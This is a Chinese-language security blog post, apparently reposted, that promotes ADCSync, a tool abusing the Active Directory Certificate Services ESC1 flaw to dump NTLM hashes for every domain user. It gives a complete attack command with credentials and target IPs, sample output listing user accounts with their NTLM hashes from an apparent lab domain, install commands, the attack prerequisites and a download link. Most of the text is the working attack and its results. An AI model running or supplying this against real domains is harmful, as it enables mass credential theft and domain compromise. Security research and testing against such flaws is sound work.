Dump Hash 新方法 - ADCSync

admin
admin
admin
137432
文章
113
评论
2024年3月12日12:20:13评论40 views字数 1851阅读6分10秒阅读模式

        这是利用 ESC1 快速组合而成的 DCSync 工具。是一种在不使用DRSUAPI或卷影复制的情况下执行临时 DCSync 攻击的有效方法。

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt    ___    ____  ___________   /   |  / __ / ____/ ___/__  ______  _____  / /| | / / / / /    __ / / / / __ / ___/ / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__/_/  |_/_____/____//____/__, /_/ /_/___/                         /____/Grabbing user certs:100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

介绍

        ADCSync 使用 ESC1 漏洞从 Active Directory 环境中的用户帐户转储 NTLM 哈希值。该工具将首先抓取传入的 Bloodhound 转储文件中的每个用户和域。然后它将使用 Certipy 为每个用户发出请求并将其 PFX 文件存储在证书目录中。最后,它将使用 Certipy 通过证书进行身份验证并检索每个用户的 NT 哈希值。此过程非常慢,可能需要一段时间才能完成,但提供了另一种转储 NTLM 哈希值的方法。

git clone https://github.com/JPG0mez/adcsync.gitcd adcsyncpip3 install -r requirements.txt

用法

要使用这个工具,我们需要以下东西:

  1. 有效的域凭据

  2. 将传入的来自 Bloodhound 转储的用户列表。

  3. 容易受到 ESC1 攻击的模板(使用 Certipy find 发现)

Dump Hash 新方法 - ADCSync

下载地址:

https://pan.quark.cn/s/a08f566d9933

原文始发于微信公众号(TtTeam):Dump Hash 新方法 - ADCSync

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月12日12:20:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Dump Hash 新方法 - ADCSynchttps://cn-sec.com/archives/2568628.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息